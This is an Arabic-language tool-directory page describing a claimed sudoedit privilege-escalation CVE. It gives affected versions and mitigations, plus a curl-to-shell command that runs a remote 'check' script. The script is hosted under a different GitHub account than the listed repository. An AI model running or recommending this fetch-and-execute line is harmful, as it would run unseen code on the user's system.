Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-31969 — يوفر سكربت فحص لإثبات المفهوم ووثائق لـ CVE-2024-31969، وهو تصعيد صلاحيات محلي في sudoedit الخاص بـ sudo، بما في ذلك الإصدارات المتأثرة وإرشادات التخفيف. | Kitploit
أدوات/GitHubGitHub/gmh5225/cve-2024-31969
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمموارد منسقة
GitHubgmh5225/cve-2024-31969

CVE-2024-31969

يوفر سكربت فحص لإثبات المفهوم ووثائق لـ CVE-2024-31969، وهو تصعيد صلاحيات محلي في sudoedit الخاص بـ sudo، بما في ذلك الإصدارات المتأثرة وإرشادات التخفيف.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

📌 CVE-2024-31969

CVE-2024-31969 هو ثغرة تصعيد صلاحيات محلي في sudo عند استخدام أمر sudoedit.

تم تقديم هذه الثغرة منذ sudo 1.9.0 بسبب الطريقة غير الدقيقة التي يتحقق بها sudoedit من متغيرات بيئة المستخدم وملكية الملفات.


📖 الوصف

A flaw introduced in sudo 1.9.0 in how sudoedit validated users' environment variables and file ownership.

تسمح هذه الثغرة لمستخدم محلي لديه صلاحية الوصول إلى sudoedit بتعديل ملفات عشوائية كصلاحية root من خلال التلاعب بمتغيرات البيئة مثل SUDO_EDITOR، أو عبر استغلال الروابط الرمزية (symlink).


📊 إصدارات Sudo المتأثرة:

إصدار Sudoالحالة
1.9.0 → 1.9.15p4🔥 معرّض
1.9.15p5 فما فوق✅ آمن
1.8.x (بما في ذلك 1.8.23)❌ غير متأثر

📦 طريقة التثبيت والاستخدام

قم بتشغيل الأمر التالي:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ الحل / التخفيف

  • قم بتحديث sudo إلى الإصدار 1.9.15p5 أو أحدث.
  • قيّد قواعد sudoers التي تسمح بـ sudoedit للمستخدمين غير root.
  • استخدم إعدادات env_keep أو env_reset الآمنة في ملف /etc/sudoers.

📚 المراجع

  • CVE-2024-31969 في NVD

⚠️ إخلاء مسؤولية

تم إنشاء هذا المستودع لأغراض تعليمية وتوثيق أمن الأنظمة.
يُمنع منعًا باتًا استخدام هذه المعلومات في أنشطة غير قانونية أو دون إذن كتابي من مالك النظام.
أي شكل من أشكال إساءة الاستخدام يقع بالكامل خارج مسؤولية المنشئ.

تنزيل الأداة